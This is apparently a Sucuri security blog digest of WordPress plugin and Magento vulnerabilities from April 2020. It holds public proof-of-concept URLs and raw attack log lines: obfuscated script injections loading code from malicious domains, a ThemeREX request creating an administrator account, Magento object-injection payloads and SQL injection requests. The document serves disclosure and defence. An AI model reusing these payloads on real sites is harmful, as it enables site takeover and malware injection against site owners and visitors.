• Skip to primary navigation
  • Skip to content
  • Skip to primary sidebar
  • Skip to footer

Sucuri Blog

Website Security News

  • Products
    • Website Security Platform
    • Website Firewall (WAF)
    • Enterprise Website Security
    • Multisite Solutions
  • Features
    • Detection
    • Protection
    • Performance
    • Response
    • Backups
  • Partners
    • Agency Solutions
    • Partners
    • Referral Program
    • Ecommerce
  • Resources
    • Guides
    • Webinars
    • Infographics
    • SiteCheck
    • Reports
    • Email Courses
  • Immediate Help
  • Login
Labs Note

Vulnerabilities Digest: April 2020

May 1, 2020John Castro

0
SHARES
FacebookTwitterSubscribe

Relevant Plugins and Vulnerabilities:

Plugin Vulnerability Patched Version Installs
Widget Settings Importer/Exporter Stored XSS Closed 40000
Accordion Stored/Reflected XSS 2.2.9 30000
Support Ticket System By Phoeniixx Reflected XSS Closed 2000
Gutenberg Blocks Authenticated Settings Change 1.14.8 200000
WP Lead Plus X Stored XSS 0.99 70000
OneTone Stored XSS Closed 20000
WP Advanced Search SQL Injection 3.3.6 1000
Easy Forms for Mailchimp Authenticated XSS 6.6.3 100000
CM Pop-Up banners Stored XSS 1.4.11 10000
Duplicate Page and Post SQL Injection 2.5.8 50000
WP post page close SQL Injection Closed —-

Highlights for April 2020

  • Developers are still falling short when sanitizing user input, leading to the exploitation of vulnerable third-party components.
  • Cross site scripting is still the most prevalent vulnerability. Bad actors are taking advantage of the lack of restrictions in critical functions and issues surrounding user input data sanitization.
  • Unprotected AJAX action bugs are still on the rise. Attackers aren’t hesitating to automate malicious injections for vulnerable plugins.
  • Access bypass bugs continue to be the most critical vulnerability.
  • We saw a spike in attempts to exploit old Magento vulnerabilities

Details for these highlights can be found under the components listed below.

WP-Advanced-Search

Developers fixed an unauthenticated SQL Injection in WP-Advanced-Search which was caused by an improper handling of user input data.

Public PoC:

GET /wp-content/plugins/wp-advanced-search/class.inc/autocompletion/autocompletion-PHP5.5.php?q=admin&t=wp_autosuggest&f=[malicious payload] 

Patch (version 3.6):

Developers removed the “autocompletion-PHP5.5.php” file and added restrictions to multiple SQL queries.

--- a/wp-advanced-search.old/class.inc/autocompletion/autocompletion-PHP5.5.php
+++ /dev/null
@@ -1,58 +0,0 @@
-<?php
-if(isset($_GET['q']) && !empty($_GET['q'])) {
-       $query = htmlspecialchars(stripslashes($_GET['q']));
-
-       // Récupération à la volée des informations transmises par le script d'autocomplétion
-       $table   = htmlspecialchars($_GET['t']);
-       $field   = htmlspecialchars($_GET['f']);
-       $type    = htmlspecialchars($_GET['type']);
-       $encode  = htmlspecialchars($_GET['e']);
[...]
-    // Requête de recherche dans l'index inversé (base de mots clés auto-générés)
-    // $requeteSQL = "SELECT DISTINCT ".$field." FROM ".$table." WHERE ".$field." LIKE '".$arg.$link->real_escape_string($query)."%' ORDER BY ".$field." ASC, idindex DESC LIMIT 0 , ".$limitS."";
-    $requeteSQL = "SELECT ".$field." FROM ".$table." WHERE ".$field." LIKE '".$arg.$link->real_escape_string($query)."%' ORDER BY ".$field." ASC, idindex DESC";

Support Ticket System By Phoeniixx

The plugin Support Ticket System By Phoeniixx was closed due to lack of maintenance, but existing users are still impacted by a reflected Cross Site Scripting vulnerability.

Public PoC:

GET  site.com/?view_id=[malicious payload] 

Vulnerable Code:

<script>

var newurl      = '<?php echo admin_url('admin-ajax.php') ;?>';                       
var get_val = '<?php echo (!empty($_GET['view_id']))?$_GET['view_id']:""; ?>';

</script>

Plugin & Theme Payloads Added to Ongoing Campaign

The Popup builder plugin allows site owners to easily create promotion popups. This past month, versions < 3.64 were affected by an unauthenticated stored XSS and attackers are still using it to infect thousands of sites.

Malicious domains injected this month

slow[.]destinyfernandi[.]com
ws[.]stivenfernando[.]com
stat[.]trackstatisticsss[.]com

Exploit Attempts Seen in the Wild

This past month, our team identified attacks against the following vulnerable plugins and themes.

OneTone theme (closed)
164.132.194.160 -- POST -- /wp-admin/admin-ajax.php -- action=onetone_options_import&options=%7B%22header_social_icons%22%3A%5B%5D%2C%22page_title_bar_background1%22%3A%7B%22background-color%22%3A%22%22%2C%22background[...]2C%22top_bar_info_content%22%3A%22%22%2C%22copyright%22%3A%22%3Cscript%3Eeval(String.fromCharCode(118,97,114,32,117,32,61,32,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,48,52,44,49,49,54,44,49,49,54,44,49,49,50,44,49,49,53,44,53,56,44,52,55,44,52,55,44,49,49,57,44,49,49,53,44,52,54,44,49,49,53,44,49,49,54,44,49,48,53,44,49,49,56,44,49,48,49,44,49,49,48,44,49,48,50,44,49,48,49,44,49,49,52,44,49,49,48,44,57,55,44,49,49,48,44,49,48,48,44,49,49,49,44,52,54,44,57,57,44,49,49,49,44,49,48,57,44,52,55,44,49,49,53,44,49,49,54,44,49,48,57,44,54,51,44,49,49,56,44,54,49,44,49,49,57,44,57,55,44,52,57,44,52,54,44,53,51,44,52,54,44,53,54,41,59,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,49,53,44,57,57,44,49,49,52,44,49,48,53,44,49,49,50,44,49,49,54,41,41,59,32,115,46,116,121,112,101,61,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,49,54,44,49,48,49,44,49,50,48,44,49,49,54,44,52,55,44,49,48,54,44,57,55,44,49,49,56,44,57,55,44,49,49,53,44,57,57,44,49,49,52,44,49,48,53,44,49,49,50,44,49,49,54,41,59,32,118,97,114,32,112,108,32,61,32,117,59,32,115,46,115,114,99,61,112,108,59,32,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,48,52,44,49,48,49,44,57,55,44,49,48,48,41,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,118,97,114,32,108,105,115,116,32,61,32,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,49,53,44,57,57,44,49,49,52,44,49,48,53,44,49,49,50,44,49,49,54,41,41,59,108,105,115,116,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,108,105,115,116,46,99,104,105,108,100,78,111,100,101,115,91,48,93,41,59,125))%3B%3C%5C%2Fscript%3E%22%7D -- 2020-04-27
Popup Builder
185.212.128.162 -- POST -- /wp-admin/admin-ajax.php -- action=sgpb_autosave&allPopupData[...]%27on%27+%2B+eventName%2C+fn%29%3B%7D&allPopupData%5B92%5D%5Bname%5D=sgpb-WillOpen&allPopupData%5B92%5D%5Bvalue%5D=var+u+%3D+String.fromCharCode%28104%2C116%2C116%2C112%2C115%2C58%2C47%2C47%2C119%2C115%2C46%2C115%2C116%2C105%2C118%2C101%2C110%2C102%2C101%2C114%2C110%2C97%2C110%2C100%2C111%2C46%2C99%2C111%2C109%2C47%2C115%2C116%2C109%2C63%2C118%2C61%2C46%2C49%2C119%2C115%2C51%2C46%2C49%2C46%2C56%2C46%2C49%2C46%2C49%29%3Bvar+d%3Ddocument%3Bvar+s%3Dd.createElement%28String.fromCharCode%28115%2C99%2C114%2C105%2C112%2C116%29%29%3B+s.type%3DString.fromCharCode%28116%2C101%2C120%2C116%2C47%2C106%2C97%2C118%2C97%2C115%2C99%2C114%2C105%2C112%2C116%29%3B+var+pl+%3D+u%3B+s.src%3Dpl%3B+if+%28document.currentScript%29+%7B+document.currentScript.parentNode.insertBefore%28s%2C+document.currentScript%29%3B%7D+else+%7Bd.getElementsByTagName%28String.fromCharCode%28104%2C101%2C97%2C100%29%29%5B0%5D.appendChild%28s%29%3Bvar+list+%3D+document.getElementsByTagName%28String.fromCharCode%28115%2C99%2C114%2C105%2C112%2C116%29%29%3Blist.insertBefore%28s%2C+list.childNodes%5B0%5D%29%3B%7D&allPopupData%5B93%5D%5Bname%5D=sgpb-DidOpen&allPopupData%5B93%5D%5Bvalue%5D=+&allPopupData%5B94%5D%5Bname%5D=sgpb-ShouldClose&allPopupData%5B94%5D%5Bvalue%5D=var+u+%3D+String.fromCharCode%28104%2C116%2C116%2C112%2C115%2C58%2C47%2C47%2C119%2C115%2C46%2C115%2C116%2C105%2C118%2C101%2C110%2C102%2C101%2C114%2C110%2C97%2C110%2C100%2C111%2C46%2C99%2C111%2C109%2C47%2C115%2C116%2C109%2C63%2C118%2C61%2C46%2C49%2C119%2C115%2C51%2C46%2C49%2C46%2C56%2C46%2C49%2C46%2C49%29%3Bvar+d%3Ddocument%3Bvar+s%3Dd.createElement%28String.fromCharCode%28115%2C99%2C114%2C105%2C112%2C116%29%29%3B+s.type%3DString.fromCharCode%28116%2C101%2C120%2C116%2C47%2C106%2C97%2C118%2C97%2C115%2C99%2C114%2C105%2C112%2C116%29%3B+var+pl+%3D+u%3B+s.src%3Dpl%3B+if+%28document.currentScript%29+%7B+document.currentScript.parentNode.insertBefore%28s%2C+document.currentScript%29%3B%7D+else+%7Bd.getElementsByTagName%28String.fromCharCode%28104%2C101%2C97%2C100%29%29%5B0%5D.appendChild%28s%29%3Bvar+list+%3D+d[...]sgpb-css-editor&allPopupData%5B97%5D%5Bvalue%5D= 

Many other plugins are still under attack. Please check our previous lab notes for more information.

Detected IPs
185.212.128.162
164.132.194.160
188.166.16.17
66.228.44.215
173.249.6.22
54.39.10.60
5.196.207.195
84.238.108.177
109.96.171.178
92.119.185.126

ThemeREX Addons

Back in February, we shared information about a critical vulnerability in ThemeREX Addons that was disclosed to the public and later on massively exploited by attackers.

Here is the full working exploit that attackers are using to compromise vulnerable sites.

195.154.177.210 -- post -- /wp-json/trx_addons/v2/get/sc_layout?sc=wp_insert_user&role=administrator&user_login=ndvtzaifnz&user_pass=6Wlh6SA0RT -- - -- 2020-04-04
Detected IPs
195.154.177.210
5.135.143.224
84.238.108.177
109.96.171.178
92.119.185.126
82.77.172.62
82.78.189.130

Old Magento Versions Still Exploited

Unpatched Magento sites will be always targeted by attackers and that’s why we encourage users to implement all security patches in a timely manner. Multiple vulnerabilities were fixed two years ago and attackers are still taking advantage of them.

We’ve listed some of the exploits attackers are using to compromise vulnerable sites below.

Magento Made Cache – Object Injection

154.9.169.173 -- GET -- http://site.com/madecache/varnish/esi/?misc=YTozOntzOjc6InByb2R1Y3QiO3M6MToiMSI7czo2OiJvcHRpb24iO3M6MToiMSI7czoxOiJ4IjtPOjg6IlplbmRfTG9nIjoxOntzOjExOiIAKgBfd3JpdGVycyI7YToxOntpOjA7TzoyMDoiWmVuZF9Mb2dfV3JpdGVyX01haWwiOjU6e3M6MTY6IgAqAF9ldmVudHNUb01haWwiO2E6MTp7aTowO2k6MTt9czoyMjoiACoAX2xheW91dEV2ZW50c1RvTWFpbCI7YTowOnt9czo4OiIAKgBfbWFpbCI7Tzo5OiJaZW5kX01haWwiOjA6e31zOjEwOiIAKgBfbGF5b3V0IjtPOjExOiJaZW5kX0xheW91dCI6Mzp7czoxMzoiACoAX2luZmxlY3RvciI7TzoyMzoiWmVuZF9GaWx0ZXJfUHJlZ1JlcGxhY2UiOjI6e3M6MTY6IgAqAF9tYXRjaFBhdHRlcm4iO3M6NzoiLyguKikvZSI7czoxNToiACoAX3JlcGxhY2VtZW50IjtzOjE2OiJleGl0KCJNYVphWWFOYSIpIjt9czoyMDoiACoAX2luZmxlY3RvckVuYWJsZWQiO2I6MTtzOjEwOiIAKgBfbGF5b3V0IjtzOjY6ImxheW91dCI7fXM6MjI6IgAqAF9zdWJqZWN0UHJlcGVuZFRleHQiO047fX19fQ== -- - -- 2020-04-15

Magento Magecart – Object Injection

23.229.39.178 -- POST -- /freegift/cart/gurlgift -- data=YTozOntzOjc6InByb2R1Y3QiO3M6MToiMSI7czo2OiJvcHRpb24iO3M6MToiMSI7czoxOiJ4IjtPOjg6IlplbmRfTG9nIjoxOntzOjExOiIAKgBfd3JpdGVycyI7YToxOntpOjA7TzoyMDoiWmVuZF9Mb2dfV3JpdGVyX01haWwiOjU6e3M6MTY6IgAqAF9ldmVudHNUb01haWwiO2E6MTp7aTowO2k6MTt9czoyMjoiACoAX2xheW91dEV2ZW50c1RvTWFpbCI7YTowOnt9czo4OiIAKgBfbWFpbCI7Tzo5OiJaZW5kX01haWwiOjA6e31zOjEwOiIAKgBfbGF5b3V0IjtPOjExOiJaZW5kX0xheW91dCI6Mzp7czoxMzoiACoAX2luZmxlY3RvciI7TzoyMzoiWmVuZF9GaWx0ZXJfUHJlZ1JlcGxhY2UiOjI6e3M6MTY6IgAqAF9tYXRjaFBhdHRlcm4iO3M6NzoiLyguKikvZSI7czoxNToiACoAX3JlcGxhY2VtZW50IjtzOjE2OiJleGl0KCJNYVphWWFOYSIpIjt9czoyMDoiACoAX2luZmxlY3RvckVuYWJsZWQiO2I6MTtzOjEwOiIAKgBfbGF5b3V0IjtzOjY6ImxheW91dCI7fXM6MjI6IgAqAF9zdWJqZWN0UHJlcGVuZFRleHQiO047fX19fQ== -- 2020-04-14

Magento Core – SQL Injection

45.11.24.151 -- GET -- /catalog/product_frontend_action/synchronize?ids%5B0%5D%5Badded_at%5D=&type_id=recently_products&ids%5B0%5D%5Bproduct_id%5D%5Bto%5D=%29%29%29+OR+%28SELECT+1+UNION+SELECT+2+FROM+DUAL+WHERE+123%3D123%29+--+-&ids%5B0%5D%5Bproduct_id%5D%5Bfrom%5D=%3F -- - -- 2020-04-26

Public exploits already exist for all of the components listed above. We strongly encourage you to keep your software up to date to prevent infection and mitigate risk to your environment. Websites behind the Sucuri Firewall are protected against these exploits.

0
SHARES
FacebookTwitterSubscribe

Categories: Ecommerce Security, Magento Security, Sucuri Labs, Vulnerability Disclosure, Website Malware Infections, Website SecurityTags: Black Hat Tactics, Labs Note, Malware, Vulnerability, WordPress Plugins and Themes

About John Castro

John Castro is Sucuri's Vulnerability Researcher who joined the company in 2015. His main responsibilities include threat intelligence and vulnerability analysis. John's professional experience covers more than a decade of pentesting, vulnerability research and malware analysis. When John isn't working with WordPres plugin vulnerabilities, you might find him hiking or hunting for new restaurants. Connect with him on LinkedIn

Reader Interactions

Primary Sidebar

Socialize With Sucuri

We're actively engaged across multiple platforms. Follow us and let's connect!

  • Facebook
  • Twitter
  • LinkedIn
  • YouTube
  • Instagram
  • RSS Feed

The Anatomy of Website Malware Webinar

Magento Webinar

PCI Compliance Guide

Magento Security Guide

How to Clean a Hacked Website Guide

How to know you can trust a plugin

Join Over 20,000 Subscribers!

Footer

Products

  • Website Firewall
  • Website AntiVirus
  • Website Backups
  • WordPress Security
  • Enterprise Services

Solutions

  • DDos Protection
  • Malware Detection
  • Malware Removal
  • Malware Prevention
  • Blacklist Removal

Support

  • Blog
  • Knowledge Base
  • SiteCheck
  • Research Labs
  • FAQ

Company

  • About
  • Media
  • Events
  • Employment
  • Contact
  • Testimonials
  • Facebook
  • Twitter
  • LinkedIn
  • Instagram

Customer Login

Sucuri Home

  • Terms of Use
  • Privacy Policy
  • Frequently Asked Questions

© 2022 Sucuri Inc. All rights reserved

Sucuri Cookie Policy
See our policy>>

Our website uses cookies, which help us to improve our site and enables us to deliver the best possible service and customer experience.